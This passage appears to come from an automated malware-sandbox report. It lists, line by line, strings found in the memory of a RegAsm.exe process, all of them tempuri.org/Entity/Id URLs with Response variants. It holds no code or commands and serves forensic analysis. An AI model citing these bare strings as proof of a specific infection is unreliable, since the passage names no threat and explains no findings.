                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003499000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003499000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003499000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003499000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
